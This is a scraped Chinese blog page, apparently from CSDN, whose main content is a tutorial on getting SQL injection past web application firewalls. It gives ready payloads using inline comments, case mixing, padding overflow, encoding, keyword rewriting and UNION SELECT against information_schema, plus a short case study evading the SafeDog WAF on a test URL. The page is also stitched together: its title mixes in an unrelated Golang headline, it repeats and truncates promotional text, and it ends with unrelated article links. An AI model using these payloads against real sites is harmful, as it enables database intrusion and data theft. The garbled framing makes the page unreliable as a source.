2024年最新聊一聊SQL注入常用绕WAF小技巧_sol注入常见的过waf方法,2024年最新为什么Golang要采用Binder作为IPC机制

最新推荐文章于 2024-07-03 03:50:27 发布
最新推荐文章于 2024-07-03 03:50:27 发布
阅读量340 收藏 6
点赞数 5
文章标签: go 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84911002/article/details/138929488
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

二、常用绕WAF小技巧

1、常用注释符号

注释符号在我们平时绕waf中经常用到,也是比较经典的,我们经常在进行SQL注入的时候利用注释符号对一些恶意SQL语句进行换行注释等方式绕过WAF的检测机制,常见的注释符号有以下几种:


//, -- aa, /*!*/, /**/,#, ;(分号)%00

2、大小写随机转换

在很多时候,waf更多的检测是对某个单词进行统一检测过滤,或者对统一小写进行过滤,或统一大写字母进行过滤,没有进行无规则化的过滤就会出现漏洞;例如输入"select"为恶意语句,而"SeLeCt"、"sElECT"、"SELEct"等等不在黑名单机制中则不属于危险语句。

3、内联注释

内联注释个人理解为"万金油",在实战中绕waf大部分都会使用到内联注释,还是多变的内联注释,使其变幻莫测,让人捉摸不透。

(1)简单的内联注释

Id=100/*!union*/select

(2)在内联注释中增加干扰符,绕过waf对内联注释的黑名单机制

Id=-2/*%!"/*/union/*%!"/*/select 1,2

(3)多重内联注释绕过单层检测防护

Id=100/*!/*!union*/*/select

(4)多个语句或单词运用内联注释

Id=100/*!/*!union*/*/select 1,2,/*!table_name*/ /*!from*/ /*!information_schema.tables where table_schema=database()*/ limit 0,1

(5)注释变量参数

Id=-1+UnIoN/*&s=*/sEleCT/*&s=*/1,2,3,database(),5,6#

4、溢出

WAF大多数都是C、C#语言编写的,在其加载和装载数据的过程中超出一定的量很容易导致溢出现象,这种一般出现在大批量的恶意请求或者响应校验时出现。


Id=-1/*SJKADASDKSAJDJWIJDLAJSKJALDJSKAJDKNSAKDWHIDASDAHSKJHADJKKADHHASHKAHKADSHKADHSKASHKSAHJSHAASKJASDKHHASKHSHSSAKHDHKSHJKHSDAKJDHSAJKHDJKADHAKJHDKAJHDJADHAJKHDJAHDJKAHDJKAHDAKJDHAJKHDAJKDHJAKHDJKADHAKJDHAJHDAKJHDJKAHSDJKAHDWHDAOWIDOQIOUQEYQIRHSAKLHOQWHDOASDASDKAHDAKJHWHIDH*/order by 1 -- AA

5、变换编码

在我们常见的传参中大多数传值时会进行一次URL编码、base64编码等多种编码后解码进行校验机制,这时我们可以利用其性质进行多次编码,绕过WAF解码后的检测。

6、同等函数或关键词替换

对于waf来说,有时候只会匹配一种函数进行过滤,但可以起到同等作用的函数则忽略了,我们换了函数之后就可以绕过waf。


schema和database``substr和substring``........

7、多种组合进行配合

配合%0a(换行)、/\*!\*/、-- AA组合等进行多种组合Bypass

8、重写

对waf过滤的函数或者单词进行重写,检测完毕后去除危险函数后还会保留某些字符进行重新组合。例如:"select" 检测之后会变成空白,我们重写为"seselectlect",检测一遍去除"select" 还剩下"select" 。

9、等号过滤替换

很多waf对等号比较敏感,我们可以使用大于号和小于号绕过、rlike\\like\\regexp替换绕过、strcmp/strncmp/between等函数替换绕过等等。

三、小案例

(1)简单测试复现存在安全狗拦截

http://www.test.com/1.php?type_id=1 and 1=1 -- aa

(2)对and进行使用&并进行编码,正常返回

http://www.test.com/1.php?type_id=1%20%26%26%201=1 -- aa

(3)直接使用select database()发现检测

http://www.test.com/1.php?type_id=1 and select database() -- aa

(4)利用%0a、/*!*/进行整合绕过,就能获取到数据库信息

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84911002
关注
ClickHouse是如何批量写入的?
机器学习与系统
12-30 5782
简介批量写入又称为bulk write,对于单表插入多条数据的场景,可以减少插入请求数量,提高吞吐量和效率。clickhouse官方Golang驱动clickhouse-go[1]支持该...
2024Go最全Go异常处理——defer、panic、recoverGolang零基础
2401_84920027的博客
05-11 457
事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!二、panic和recover(宕机和宕机恢复)
ZLMediaKit 服务器源码解读---RTSP推流拉流
小小东西的博客
02-09 6461
rtsp推流拉流过程
clickhouse批量插入数据
呆萌的代Ma
04-13 2177
按照如下模板进行插入: ```sql INSERT INTO 数据库.数据表 (列1,列2,列3) VALUES (列1的新数据, 列2的新数据, 列3的新数据), (列1的新数据, 列2的新数据, 列3的新数据), (列1的新数据, 列2的新数据, 列3的新数据), ```
python clickhouse批量插入数据
最新发布
weixin_41460211的博客
07-03 186
Python,数据库相关视频讲解:python的or运算赋值用法用python编程Excel有没有用处?011_编程到底好玩在哪?查看python文件_输出py文件_cat_运行python文件_shelPython ClickHouse批量插入数据 ClickHouse是一款开源的面向列式存储的分布式数据库管理系统...
sql注入方法总结
12-19
sql注入方法总结,waf,D盾
SQL注入WAF小结
05-08
本文将对几种常见SQL注入WAF方法进行详细说明。 #### 二、SQL注入类型 1. **GET注入**:通常发生在URL查询参数中。 2. **POST注入**:发生在HTTP POST请求的数据体中。 3. **COOKIE注入**:利用Cookie中的...
深入了解SQL注入waf和过滤机制
02-11
"深入了解SQL注入waf和过滤机制" SQL 注入WAF 和过滤机制是一...SQL 注入WAF 和过滤机制是一个非常复杂的过程,需要对 WAF常见特征和特点有充分的了解,并且需要对多种过技术有充分的了解和掌握。
SQL注入中的WAF过技术
08-19
SQL注入中的WAF过技术,里面的思路很好,可以学习一下
hive之HQL常用命令
qq_41275983的博客
09-26 1419
Hive之HQL常用命令 HQL常用命令Hive之HQL常用命令一、DDL数据定义1、创建数据库:2、查询数据库:3、修改数据库:4、删除数据库:5、创建表:6、分区表:7、修改表:8、删除表:二、DML数据操作1、向表中加载数据:2、插入数据:3、import的导入导出:4、数据导出5、清除表中数据:三、查询1、查询:2、算术运算符:+、-、*、/、%、&、|、^、~3、常用函数:4、limit语句:限制返回的函数,在sql语句最后一行;where语句:筛选条件;5、比较运算符:between、i
ZLMediaKit源码分析
05-31
目录 1 引言 5 1.1 背景 5 1.2 目的 5 1.3 参考资料 5 2 架构分析 6 3 主要模块 9 3.1 Thread 9 3.2 Socket 11 3.3 TcpServer&TcpClient 11 3.4 Util 12 3.4.1 NotilceCenter 12 3.5 Extention 13 3.6 MediaSource 13 3.7 Pusher 14 3.8 Player 14 3.9 Session 15 3.10 RtmpSession 15 3.11 Rtp 17 4 主要流程图 18 4.1 Rtsp交互流程 18 4.2 Rtmp推流 19 4.3 RtspMux 19 4.4 WebApi 20 4.4.1 GetMediaList获取媒体列表 20 5 模块目录结构 21 5.1 3rdpart 21 5.1.1 ZLToolKit 21 5.2 Src 21 5.2.1 Codec 21 5.2.2 Common 21 5.2.3 Extension 22 5.2.4 Rtcp 24 5.2.5 Player拉流客户端 24 5.2
Go-GolangWebSocket框架
08-13
Golang WebSocket 框架
golang websocket
05-28
安装go revel框架的时候,golang.com/x/net中的包总是下不下来。放在这里方便大家使用。具体的使用方法就不累赘了,如有问题请给我发信。
ZLMediaKit源码分析 - NotifyCenter
成长之路
07-17 1519
ZLMediaKit学习 - NoticeCenter
clickhouse 批量插入数据_ClickHouse常用命令
热门推荐
weixin_30444625的博客
01-10 1万+
一.安装使用ClickHouse是Yandex提供的一个开源的列式存储数据库管理系统,多用于联机分析(OLAP)场景,可提供海量数据的存储和分析,同时利用其数据压缩和向量化引擎的特性,能提供快速的数据搜索。Ⅰ).安装sudo yum install yum-utils sudo rpm --import https://repo.yandex.ru/clickhouse/CLICKHOUSE-KE...
ZLMediaKit源码分析(一)服务启动
cliffordl的专栏
06-08 5124
第二次调用setupEvent()在EventPollerPool::Instance().for_each()批量clone的时候,TcpServer::TcpServer()->Server::Server()->EventPollerPool::Instance()->TaskExecutorGetterImp::addPoller()已经批量创建了poller。Socket::_on_before_accept实际也调用的是TcpServer::_on_create_socket。
Golang安装和配置指南:从零开始的高效开发之旅
hitpter的专栏
10-16 529
Golang(又称Go)是一种快速、可靠且高效的编程语言,由Google开发并在开源社区广泛应用。Golang的设计目标是通过简洁的语法和强大的并发模型提供高效的开发体验。在本文中,我们将指导您如何安装和配置Golang,以便开始您的Golang开发之旅。
ZLMediaKit源码分析(一)启动
yudaichenydc的博客
11-23 2533
常用的定时器有最小堆、时间轮、红黑树,ZLMediaKit采用std::map红黑树实现,key保存时间,value保存std::function,这一块的实现存在争议。单例模式,初始化线程池,EventPollerPool 初始化了线程池的大小 ,_threads遍历使用。用作会话管理,用来处理每一种协议的拆包、解析、封装等功能,事件与已经链接的fd的读、写、关闭事件属于同级事件。首先会设置线程池的大小,线程池大小默认是。3、线程池的item poller,执行。,执行为当前poller的fd设置。
SQL注入WAF策略与技巧解析
以下是一些常用SQL注入WAF方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数传递恶意SQL代码。 - POST注入:在表单提交的数据中插入SQL。 - COOKIE注入:利用HTTP头或Cookie中的数据进行注入。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值